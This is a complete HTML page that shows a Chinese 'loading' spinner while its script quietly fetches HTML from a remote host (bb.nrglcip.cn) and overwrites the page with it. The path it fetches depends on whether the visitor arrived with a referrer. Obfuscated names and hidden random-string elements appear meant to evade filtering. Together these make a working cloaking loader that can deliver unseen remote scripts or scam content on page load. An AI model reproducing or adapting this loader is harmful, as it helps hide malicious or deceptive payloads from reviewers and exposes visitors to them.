<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .cwS3U5y2 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .cwS3U5y2 .Vz0eiTX {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .cwS3U5y2 .content {
            line-height: 50px;
            text-align: center
        }

        .cwS3U5y2 .img {
            width: 100%
        }

        .cwS3U5y2 .DE4xTuQOTrt {
            text-align: center
        }

        .cwS3U5y2 .DE4xTuQOTrt span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .cwS3U5y2 .DE4xTuQOTrt span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .cwS3U5y2 .DE4xTuQOTrt span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .cwS3U5y2 .DE4xTuQOTrt span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .cwS3U5y2 .DE4xTuQOTrt span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .cwS3U5y2 .DE4xTuQOTrt span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .cwS3U5y2 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function NisKfbWSoU(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var I3BylXC = NisKfbWSoU('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ I3BylXC +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ I3BylXC +".html?a=share";
		}
		
        T5GW5kkE=url+"#"+new Date().getTime();
        T5GW5kkE && function() {
            $.get(T5GW5kkE, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>Zv5pBjW08vsaCUgwprbInUabqlxKi3el20G</span>
<span style='display:none'>Zv5pBjW08vsaCUgwprbInUabqlxKi3el20G</span>
<a  href='#' style='display:none'>yDtlIax3yzMr92cnprZX7EQQipEVnTHN27Ll6cXW3ypihKg40buZRs</a><div class="cwS3U5y2">
    <div class="Vz0eiTX">
        <div class="DE4xTuQOTrt">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >sXQSy4d0u8MJt0oTF9yoz8cq</h1>
<p  style='display:none'>iuWi4BAyUDpj7uW3pyGJd1ActZ</p>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>iM1ciBEz3fZ0N7vD</a>
<li style='display:none' >RxD6b9tpvgmQIpnLiW1MRruyYpnvRcaU5aAcCg3lwuDp3LHKch9udd2PfbNakjKJvqyYWVUUtkUjpWjr3wO9irtdNkCJs6tYfW</li></body>
</html>